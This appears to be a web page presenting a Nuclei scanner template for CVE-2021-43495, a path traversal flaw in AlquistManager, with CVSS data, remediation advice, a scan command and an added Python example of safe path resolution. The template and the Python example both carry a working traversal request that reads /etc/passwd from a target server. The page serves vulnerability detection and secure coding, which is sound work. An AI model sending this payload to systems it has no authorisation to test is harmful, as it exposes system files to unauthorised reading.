AlquistManager Local File Inclusion
ID: CVE-2021-43495
Severity: high
Author: pikpikcu
Tags: cve2021,cve,lfi,alquist,alquistai
Description
AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
YAML Source
id: CVE-2021-43495

info:
  name: AlquistManager Local File Inclusion
  author: pikpikcu
  severity: high
  description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or remote code execution.
  remediation: |
    Ensure that user-supplied input is properly validated and sanitized before being used in file inclusion functions.
  reference:
    - https://github.com/AlquistManager/alquist/issues/43
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43495
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-43495
    cwe-id: CWE-22
    epss-score: 0.03503
    epss-percentile: 0.9064
    cpe: cpe:2.3:a:alquistai:alquist:2017-06-13:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: alquistai
    product: alquist
  tags: cve2021,cve,lfi,alquist,alquistai

http:
  - method: GET
    path:
      - "{{BaseURL}}/asd/../../../../../../../../etc/passwd"

    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 4a0a00473045022100b43c9ac408018b86c4f3c81a8edf2ac80739298a3e0a08aefc0ff41767a4773902203d5274a40adef508f44fda9256b076cfb2bd3a4a9a55ad58b2eca4ae2951905c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-43495.yaml"
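
The remediation field in the template asks for user-supplied paths to be validated before file access. As an added example (not code from AlquistManager or from the template author), the Python below contrasts a hypothetical join-and-normalise resolver with a containment check, using the template's request path as input. The function names, the /srv/app/static base and the temporary web root are assumptions, and the requested path is assumed to be already URL-decoded by the framework.

```python
import os
import tempfile

# Request path from the template's http section (the part after {{BaseURL}}/).
PROBE = "asd/../../../../../../../../etc/passwd"


def naive_resolve(base_dir, requested):
    """Hypothetical unsafe pattern: join and normalise, never check the result."""
    return os.path.normpath(os.path.join(base_dir, requested))


def safe_resolve(base_dir, requested):
    """Return the real path of `requested` inside base_dir, or None if it escapes."""
    if "\x00" in requested:
        return None
    base = os.path.realpath(base_dir)
    # realpath collapses ".." and follows symlinks, so the check below sees
    # the file that would actually be opened. Joining an absolute path
    # discards `base`, which the same check rejects.
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def demo():
    """Run safe_resolve against a constructed web root and return the results."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.html"), "w") as fh:
            fh.write("ok")
        # Constructed edge case: a symlink inside the root pointing outside it.
        os.symlink("/", os.path.join(root, "link"))
        return {
            "probe": safe_resolve(root, PROBE),
            "absolute": safe_resolve(root, "/etc/passwd"),
            "symlink": safe_resolve(root, "link/etc/passwd"),
            "nul": safe_resolve(root, "index.html\x00.png"),
            "ok": safe_resolve(root, "index.html"),
        }


if __name__ == "__main__":
    print("naive:", naive_resolve("/srv/app/static", PROBE))
    for name, value in demo().items():
        print(f"{name}: {value}")
```
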